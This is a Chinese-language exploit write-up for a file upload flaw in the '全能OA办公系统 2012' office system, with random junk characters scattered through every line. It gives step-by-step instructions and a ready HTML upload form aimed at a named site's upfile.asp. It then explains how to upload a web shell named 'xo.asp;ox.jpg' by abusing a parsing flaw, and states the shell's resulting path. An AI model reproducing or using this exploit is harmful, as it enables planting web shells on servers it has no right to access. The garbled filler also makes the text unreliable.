全能OA办公系统 上传漏洞
! c- @$ @: Z2 `& U0 ^8 u4 _& p5 S7 U) y# y
系统介绍:
5 l- f" }8 z- W' i9 L* s9 g8 P7 |( `7 c. S3 _" l
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
' O$ i/ M$ U/ P# U% ~; F Z0 L+ t D
主要功能:; o6 Q$ ]. t2 h0 h4 G
公司通告
8 N1 i3 s9 t; ^工作计划
% W5 }$ p. v) L7 n通讯助理 9 x1 ~. Y! r* ?6 T( ~1 e, Y
客户资源
6 s7 |' H; S9 \我的公文
2 [) D" L: w3 c' J公文传阅 " G$ g/ Q( ~: b# s7 }+ m4 i- I
公共资源 7 I1 y" _& s1 C0 K3 Q2 K& S
资源预约 ! r5 k$ o+ n6 e, \/ v q
今日考勤
5 {2 @$ H; P9 o* C- T7 [个人计划 5 z J' ?5 g( a/ _! m
个人通讯录 4 @3 a- h( b) a" h
个人基本档案
V% m1 `) f9 f& J: ~未读邮件 ! D9 G% Y) K9 L" _, c+ q# i
发邮件
5 a6 C: \7 C" w# G' R) u% B收件夹 3 }8 l7 ^5 B2 b1 [8 ~
寄件夹
9 w) E+ i% D1 `( e( u# a, M' h5 \网络硬盘 . _8 t) l1 r- s3 r3 d( P4 e6 V
网络会议 ) g3 [+ e( Q; R7 U+ K, A. J
网络调查
1 J8 b8 o, B7 d1 r9 j2 O0 u交流论坛: U% i- {. J3 f0 c7 e; |
, w6 P4 ]8 c& S$ g& M; O9 C& \' l有兴趣测试的朋友可以下源码看看. V2 K( W" ?) Q2 q
4 a# s+ @1 x5 f# b源码下载:
: I% t5 N7 k7 }7 A7 r; ~. Z
9 I2 T1 ~& @' I+ Uhttp://www.mycodes.net/30/4750.htm- X; B$ l3 ~9 F
3 r' t; V) W( N, k5 o; j" Q+ x' B' ?: v( E
漏洞介绍:
. A% F/ c) Q: ?0 j8 T, Z" f* a8 Q3 w2 ?) r1 d; Y& p1 J
由upfile.asp上传文件漏洞引起& u0 ~+ |& B. q
9 V$ e# ^" D' a3 r测试方法:
o2 ^' O$ g: p' y& H, l/ P6 D g' L5 N
使用名小子上传http://www.itlynn.com/upfile.asp即可' m! L; B" u# {
+ l! n: g7 j8 R0 M8 ~( Z& N0 u' n如果upfile.asp文件被删除不存在。3 K4 P W+ R ]6 W# ~
g+ N* Z6 Z1 ^) T0 Q 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
* U" B+ y M) n$ F" J# v8 B& L& f2 T
如果存在那么将如下代码保存为upfile.html。
5 p# s' b2 E% g% }' x9 X, t& q. C: d- m
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
, J- b$ Q4 s2 C7 V) |3 G2 T/ A: N; p% V
. M. e* n4 f: u& \8 d " G5 b3 o# y% m& ~
" }# n9 Y7 ]8 T& i7 \0 u1 A) G9 k01 <table border='0' align="center" cellpadding="5"> & }& v0 |0 z8 R4 u: ?
! e" y- _9 Q- P8 T* M
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
3 o; Q' L9 c8 L$ H" z' E O5 E* `$ V
03 <tr> 6 y6 |1 U: `* J) I: @
4 h# ]2 D8 E5 U7 O4 e" K9 s$ W" K( b1 n04 <td>报错:</td>
3 p- X% G, Y2 p& B5 e: R1 |( A/ m, T" H5 Z
05 <td><input type='radio' name='errnumber' value='0'>
, p0 C% g, L( U" o2 _" y7 `. P' T
% C( i" W1 l+ g/ n, }06 自动更名
+ |- W1 H! f/ Q0 V5 [; \
2 X- u: ^9 C. [9 J/ ]6 }07 <input type='radio' name='errnumber' value='1' checked>
( }4 B+ y: |: a
9 N- }3 J% s# R2 a/ o, v08 报错方式
/ W+ N0 Q2 F1 L ?7 }& |, ?' x. u2 \- q" b/ X
09 <input type='radio' name='errnumber' value='2'>
3 Y3 [# w& X7 a2 w _: s
7 k0 F% e, n7 w& B ` P10 直接覆盖</td> , w8 _9 G- k4 w g7 n5 W3 Z
7 t! N `2 ?2 i/ l11 </tr> 8 O/ N8 E( k, ?& J
( ~% t$ n9 k) h. D- E12 <tr> ?# p1 I0 i8 d: T
; r7 S# A+ \3 g" L& [/ M- g
13 <td>主题:</td>
2 ^: @, G& l3 i2 I- I' x, O
' w# U9 N/ ~" H: Q1 E$ ?' [, V3 ^14 <td><input type='text' name='filename' size='30'></td> % S$ z1 f. N( V( P
7 l" z' T# o- p: C& _% Q
15 </tr> : V; ]! x. o! R
, U" ^* ^3 B% }0 v$ c
16 <tr>
, O$ k5 W. j$ R2 v/ r
) K v2 r, R- s% L p17 <td>文件:</td> . d, n4 D- c. ]# w! F
) D- H: V$ K) v. R5 ?1 L9 t6 Y
18 <td><input type="file"name="fruit"size="30"></td>
`$ h; w! t6 n8 H2 p" B7 N* e) ~5 w- m
19 </tr> 5 B$ Z) L0 L+ C ?- D0 t
: v# D6 G7 o! ~) m
20 <tr>
/ a0 B/ \. q7 O$ A, x
5 O$ \7 V" @2 D: }21 <td valign='top'>简介:</td>
: r8 u; H6 |4 N" s7 k( q% w- L; `8 E9 @7 ?
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ! \+ U2 _5 F! O
" a* y4 R3 \% D
23 </tr> 2 D: l8 M4 Z4 J! w# U8 w- `$ r
9 G% \4 d0 z% f! s24 , |: e' m W5 O2 e. E
8 o) T4 C+ x1 ~& _: O4 j25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
) Y& @% X u* _( w) k1 W+ p* k' z: O8 l+ Q" o8 S2 Y2 s
26 </tr> ' S s+ ]2 Y& K( s; t. K
* f/ s1 v8 C; ^$ E27 </form>
/ l1 a4 K: Z( u- y5 P( ?2 ~& Y( @( l. o/ `% b
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
+ q% F) d+ N9 u7 P) S! \. Y( d! I# Z' R, {
5 h9 k( E7 n5 T+ a
4 s3 |/ A6 v; Y* b6 K' L$ Y, _
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg' m% B3 h ~: \4 c) @
4 F7 C; E. H( O4 q1 }
此漏洞需要配合解析漏洞利用。
( I% ] D9 `) a. ~
3 }9 ?( i/ H# U7 {0 a& ]1 { |